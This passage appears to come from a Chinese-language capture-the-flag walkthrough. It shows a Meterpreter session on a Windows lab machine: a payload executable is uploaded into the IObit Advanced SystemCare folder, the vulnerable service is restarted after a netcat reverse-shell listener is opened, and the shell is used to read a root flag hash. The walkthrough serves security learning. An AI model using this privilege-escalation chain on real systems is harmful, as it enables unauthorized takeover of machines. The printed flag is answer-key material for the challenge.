100666/rw-rw-rw- 5430 fil 2011-02-10 07:46:46 +0800 fav.ico
100666/rw-rw-rw- 190240 fil 2015-12-24 09:32:36 +0800 madbasic_.bpl
100666/rw-rw-rw- 57632 fil 2015-12-24 09:32:38 +0800 maddisAsm_.bpl
100666/rw-rw-rw- 355616 fil 2015-12-24 09:32:40 +0800 madexcept_.bpl
100777/rwxrwxrwx 1436448 fil 2015-12-29 04:50:10 +0800 repair task.exe
100666/rw-rw-rw- 1108256 fil 2015-12-24 09:32:44 +0800 rtl120.bpl
100666/rw-rw-rw- 227104 fil 2015-12-29 04:50:30 +0800 sdcore.dll
100666/rw-rw-rw- 117536 fil 2015-12-29 04:50:32 +0800 sdlib.dll
040777/rwxrwxrwx 0 dir 2019-09-26 23:17:45 +0800 skin
100777/rwxrwxrwx 623904 fil 2016-07-26 01:01:12 +0800 smBootTime.exe
100666/rw-rw-rw- 694192 fil 2015-12-29 04:50:44 +0800 sqlite3.dll
100666/rw-rw-rw- 338720 fil 2015-12-29 04:50:52 +0800 taskmgr.dll
100666/rw-rw-rw- 119304 fil 2019-09-26 23:17:45 +0800 unins000.dat
100777/rwxrwxrwx 1208608 fil 2019-09-26 23:17:36 +0800 unins000.exe
100666/rw-rw-rw- 22701 fil 2019-09-26 23:17:45 +0800 unins000.msg
100666/rw-rw-rw- 2008864 fil 2015-12-24 09:32:46 +0800 vcl120.bpl
100666/rw-rw-rw- 222496 fil 2015-12-24 09:32:48 +0800 vclx120.bpl
100666/rw-rw-rw- 899872 fil 2015-12-29 04:50:58 +0800 webres.dll
100666/rw-rw-rw- 580 fil 2015-10-11 05:33:18 +0800 winid.dat
meterpreter > upload ~/Advanced.exe
[*] uploading : /home/zacarx/Advanced.exe -> Advanced.exe
[*] Uploaded 15.50 KiB of 15.50 KiB (100.0%): /home/zacarx/Advanced.exe -> Advanced.exe
[*] uploaded : /home/zacarx/Advanced.exe -> Advanced.exe
meterpreter > ls
Listing: C:\Program Files (x86)\IObit\Advanced SystemCare
=========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 5091616 fil 2016-08-17 02:03:56 +0800 ASC.exe
100777/rwxrwxrwx 691488 fil 2015-12-29 04:48:34 +0800 ASCDownload.exe
100666/rw-rw-rw- 166176 fil 2015-12-29 04:47:32 +0800 ASCExtMenu.dll
100666/rw-rw-rw- 187680 fil 2015-12-29 04:47:30 +0800 ASCExtMenu_64.dll
100777/rwxrwxrwx 574240 fil 2016-03-04 08:16:34 +0800 ASCInit.exe
100666/rw-rw-rw- 743 fil 2019-09-26 23:17:50 +0800 ASCInit.log
100777/rwxrwxrwx 452384 fil 2016-07-26 01:01:08 +0800 ASCService.exe
100666/rw-rw-rw- 104270 fil 2022-10-26 15:12:56 +0800 ASCService.log
040777/rwxrwxrwx 0 dir 2019-09-26 23:17:49 +0800 ASCServiceLog
100777/rwxrwxrwx 2023712 fil 2016-07-28 02:24:22 +0800 ASCTray.exe
100777/rwxrwxrwx 555808 fil 2015-12-29 05:06:42 +0800 ASCUpgrade.exe
100777/rwxrwxrwx 2400528 fil 2019-09-26 23:18:22 +0800 ASCVER.exe
100777/rwxrwxrwx 599328 fil 2015-12-29 04:48:46 +0800 AUpdate.exe
100666/rw-rw-rw- 64800 fil 2015-12-29 04:48:24 +0800 About.dll
100777/rwxrwxrwx 310560 fil 2016-07-28 02:24:20 +0800 About.exe
100666/rw-rw-rw- 21506 fil 2019-09-26 23:18:14 +0800 ActionCenter2.log
100777/rwxrwxrwx 2254624 fil 2016-01-08 09:13:48 +0800 ActionCenterDownloader.exe
100777/rwxrwxrwx 15872 fil 2022-10-26 15:16:17 +0800 Advanced.exe
100777/rwxrwxrwx 1917728 fil 2016-04-30 02:12:38 +0800 AutoCare.exe
100777/rwxrwxrwx 191264 fil 2015-12-29 04:52:24 +0800 AutoReactivator.exe
100777/rwxrwxrwx 1194784 fil 2016-04-30 02:12:40 +0800 AutoSweep.exe
100777/rwxrwxrwx 1403680 fil 2016-07-21 00:15:38 +0800 AutoUpdate.exe
100666/rw-rw-rw- 18536 fil 2019-09-27 16:32:33 +0800 AutoUpdate.log
040777/rwxrwxrwx 0 dir 2019-09-26 23:17:46 +0800 Backup
100777/rwxrwxrwx 1063200 fil 2016-03-08 02:14:22 +0800 BrowserCleaner.exe
100666/rw-rw-rw- 131872 fil 2016-07-21 00:15:42 +0800 CPUIDInterface.dll
040777/rwxrwxrwx 0 dir 2019-09-26 23:17:42 +0800 Config
100777/rwxrwxrwx 451872 fil 2015-12-29 04:49:22 +0800 DNSProtect.exe
100777/rwxrwxrwx 513528 fil 2016-04-13 04:10:24 +0800 Dashlane_Launcher.exe
040777/rwxrwxrwx 8192 dir 2019-09-26 23:17:51 +0800 Database
100777/rwxrwxrwx 2172704 fil 2016-05-07 00:50:26 +0800 DefaultProgram.exe
100666/rw-rw-rw- 11220 fil 2016-02-23 02:18:02 +0800 DetectionEx.ini
100777/rwxrwxrwx 438560 fil 2016-01-12 04:30:04 +0800 DiskDefrag.exe
100666/rw-rw-rw- 607520 fil 2015-12-29 04:49:12 +0800 DiskMap.dll
100666/rw-rw-rw- 127776 fil 2016-07-21 00:15:44 +0800 DiskScan.dll
100777/rwxrwxrwx 72992 fil 2015-12-29 04:49:16 +0800 DiskScan.exe
100777/rwxrwxrwx 110368 fil 2016-01-12 09:54:36 +0800 Display.exe
100666/rw-rw-rw- 586 fil 2022-10-26 14:03:06 +0800 Display_log.txt
100666/rw-rw-rw- 14716 fil 2013-07-20 09:31:32 +0800 DownloadApplication.xml
100666/rw-rw-rw- 81539 fil 2016-01-08 05:10:46 +0800 EULA.rtf
100777/rwxrwxrwx 1221408 fil 2016-07-21 00:15:46 +0800 FeedBack.exe
100666/rw-rw-rw- 454432 fil 2015-12-29 05:06:54 +0800 FfSweep.dll
100777/rwxrwxrwx 4939536 fil 2019-09-26 23:18:20 +0800 FreeBigupgrade1211.exe
100777/rwxrwxrwx 1019680 fil 2015-12-29 05:10:30 +0800 Homepage.exe
100666/rw-rw-rw- 750880 fil 2016-01-21 09:23:28 +0800 HomepageSvc.dll
100666/rw-rw-rw- 387360 fil 2016-03-04 04:21:28 +0800 ICONPIN32.dll
100777/rwxrwxrwx 380192 fil 2016-03-04 04:21:30 +0800 ICONPIN32.exe
100666/rw-rw-rw- 614176 fil 2016-03-04 04:21:34 +0800 ICONPIN64.dll
100777/rwxrwxrwx 582944 fil 2016-03-04 04:21:36 +0800 ICONPIN64.exe
100777/rwxrwxrwx 9474336 fil 2016-07-09 05:42:24 +0800 IObitUninstaller.exe
100666/rw-rw-rw- 899872 fil 2016-07-21 00:15:50 +0800 InfoHelp.dll
100777/rwxrwxrwx 21280 fil 2016-03-10 07:56:44 +0800 Iobit_RefreshTaskBar.exe
100666/rw-rw-rw- 15 fil 2014-07-23 05:15:36 +0800 Lang.dat
040777/rwxrwxrwx 8192 dir 2019-09-26 23:17:42 +0800 Language
040777/rwxrwxrwx 4096 dir 2019-09-26 23:18:19 +0800 LatestNews
040777/rwxrwxrwx 4096 dir 2019-09-26 23:17:45 +0800 LinkImages
100777/rwxrwxrwx 2960672 fil 2016-07-21 00:15:54 +0800 LiveUpdate.exe
100666/rw-rw-rw- 768 fil 2019-09-26 23:17:49 +0800 LiveUpdate.log
100777/rwxrwxrwx 667424 fil 2015-12-29 04:49:32 +0800 LocalLang.exe
100777/rwxrwxrwx 1530656 fil 2016-07-21 00:15:56 +0800 Monitor.exe
100777/rwxrwxrwx 533792 fil 2015-12-29 04:49:38 +0800 MonitorDisk.exe
100777/rwxrwxrwx 2111776 fil 2016-04-30 02:12:52 +0800 MyWin10.exe
100777/rwxrwxrwx 569632 fil 2016-07-23 01:20:00 +0800 Nfeatures.exe
100777/rwxrwxrwx 116000 fil 2015-12-29 04:49:40 +0800 NoteIcon.exe
100666/rw-rw-rw- 48416 fil 2015-12-29 04:49:44 +0800 NtfsData.dll
100666/rw-rw-rw- 784160 fil 2016-07-21 00:16:04 +0800 OFCommon.dll
100777/rwxrwxrwx 918816 fil 2016-07-21 00:16:06 +0800 PPUninstaller.exe
100666/rw-rw-rw- 70432 fil 2015-12-29 04:49:52 +0800 PowerConfig.dll
100666/rw-rw-rw- 629536 fil 2015-12-29 04:49:58 +0800 ProductStatistics.dll
100777/rwxrwxrwx 1044256 fil 2016-07-28 02:24:26 +0800 QuickSettings.exe
100777/rwxrwxrwx 152352 fil 2015-12-29 04:50:18 +0800 ReProcess.exe
100777/rwxrwxrwx 719648 fil 2015-12-29 04:50:02 +0800 RealTimeProtector.exe
100777/rwxrwxrwx 2052896 fil 2016-05-10 04:22:08 +0800 Register.exe
100777/rwxrwxrwx 1094944 fil 2016-07-28 02:24:28 +0800 Reinforce.exe
100666/rw-rw-rw- 1406 fil 2019-09-26 23:18:14 +0800 Reinforce.log
100777/rwxrwxrwx 490272 fil 2016-01-05 05:44:00 +0800 Report.exe
100777/rwxrwxrwx 1723680 fil 2016-07-21 09:07:08 +0800 RescueCenter.exe
100777/rwxrwxrwx 1326504 fil 2015-12-26 03:55:20 +0800 SPInit.exe
100777/rwxrwxrwx 8383688 fil 2016-07-29 01:07:04 +0800 SPSetup.exe
100666/rw-rw-rw- 783136 fil 2015-12-29 04:45:54 +0800 SPUrlScanner.dll
100666/rw-rw-rw- 1293088 fil 2015-12-29 04:50:24 +0800 Scan.dll
100777/rwxrwxrwx 802592 fil 2016-04-27 05:00:24 +0800 ScreenShot.exe
100666/rw-rw-rw- 1024000 fil 2022-10-26 14:03:29 +0800 SecurityHoleScan.log
100777/rwxrwxrwx 1887520 fil 2016-07-21 00:16:18 +0800 SendBugReportNew.exe
100777/rwxrwxrwx 1720096 fil 2016-01-12 04:30:12 +0800 SoftUpdateTip.exe
100666/rw-rw-rw- 202 fil 2019-09-26 23:18:13 +0800 SpeedUp.log
100777/rwxrwxrwx 897824 fil 2015-12-29 04:50:46 +0800 StartupInfo.exe
100777/rwxrwxrwx 2630944 fil 2016-07-28 02:26:32 +0800 Suc11_RegistryCleaner.exe
100777/rwxrwxrwx 1179936 fil 2016-07-21 00:30:20 +0800 Suc12_DiskCleaner.exe
100777/rwxrwxrwx 561440 fil 2016-01-06 09:47:42 +0800 Suo10_SmartRAM.exe
100777/rwxrwxrwx 1767712 fil 2016-07-21 00:30:26 +0800 Suo11_InternetBooster.exe
100777/rwxrwxrwx 4190496 fil 2016-07-21 00:30:28 +0800 Suo12_StartupManager.exe
100777/rwxrwxrwx 1421088 fil 2016-05-07 00:50:38 +0800 Sur13_WinFix.exe
100666/rw-rw-rw- 82720 fil 2015-12-29 04:50:48 +0800 SysRest.dll
100777/rwxrwxrwx 607520 fil 2015-12-29 04:50:50 +0800 TaskHelper.exe
040777/rwxrwxrwx 8192 dir 2019-09-26 23:17:42 +0800 Toolbox_Language
100777/rwxrwxrwx 3360032 fil 2016-04-23 08:40:54 +0800 UninstallPromote.exe
040777/rwxrwxrwx 4096 dir 2019-09-27 16:32:33 +0800 Update
100666/rw-rw-rw- 8386 fil 2016-07-28 05:09:38 +0800 Update History.txt
100777/rwxrwxrwx 1355552 fil 2016-07-22 05:32:12 +0800 Wizard.exe
100666/rw-rw-rw- 1407264 fil 2015-12-29 04:49:04 +0800 cpuidsdk.dll
100666/rw-rw-rw- 72992 fil 2015-12-29 04:49:06 +0800 datastate.dll
100777/rwxrwxrwx 242464 fil 2015-12-29 04:49:08 +0800 delayLoad.exe
040777/rwxrwxrwx 4096 dir 2019-09-26 23:17:45 +0800 drivers
100666/rw-rw-rw- 5430 fil 2011-02-10 07:46:46 +0800 fav.ico
100666/rw-rw-rw- 190240 fil 2015-12-24 09:32:36 +0800 madbasic_.bpl
100666/rw-rw-rw- 57632 fil 2015-12-24 09:32:38 +0800 maddisAsm_.bpl
100666/rw-rw-rw- 355616 fil 2015-12-24 09:32:40 +0800 madexcept_.bpl
100777/rwxrwxrwx 1436448 fil 2015-12-29 04:50:10 +0800 repair task.exe
100666/rw-rw-rw- 1108256 fil 2015-12-24 09:32:44 +0800 rtl120.bpl
100666/rw-rw-rw- 227104 fil 2015-12-29 04:50:30 +0800 sdcore.dll
100666/rw-rw-rw- 117536 fil 2015-12-29 04:50:32 +0800 sdlib.dll
040777/rwxrwxrwx 0 dir 2019-09-26 23:17:45 +0800 skin
100777/rwxrwxrwx 623904 fil 2016-07-26 01:01:12 +0800 smBootTime.exe
100666/rw-rw-rw- 694192 fil 2015-12-29 04:50:44 +0800 sqlite3.dll
100666/rw-rw-rw- 338720 fil 2015-12-29 04:50:52 +0800 taskmgr.dll
100666/rw-rw-rw- 119304 fil 2019-09-26 23:17:45 +0800 unins000.dat
100777/rwxrwxrwx 1208608 fil 2019-09-26 23:17:36 +0800 unins000.exe
100666/rw-rw-rw- 22701 fil 2019-09-26 23:17:45 +0800 unins000.msg
100666/rw-rw-rw- 2008864 fil 2015-12-24 09:32:46 +0800 vcl120.bpl
100666/rw-rw-rw- 222496 fil 2015-12-24 09:32:48 +0800 vclx120.bpl
100666/rw-rw-rw- 899872 fil 2015-12-29 04:50:58 +0800 webres.dll
100666/rw-rw-rw- 580 fil 2015-10-11 05:33:18 +0800 winid.dat
meterpreter > shell
Process 2712 created.
Channel 8 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
[SC] StartService FAILED 1056:
An instance of the service is already running.
C:\Program Files (x86)\IObit>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
我们先建立监听
nc -lnvp 4443
然后再进行启动操作
C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 2384
FLAGS :
然后我们就可以得到root权限了
C:\Users\Administrator\Desktop>type root.txt
type root.txt
9af5f314f57607c00fd09803a587db80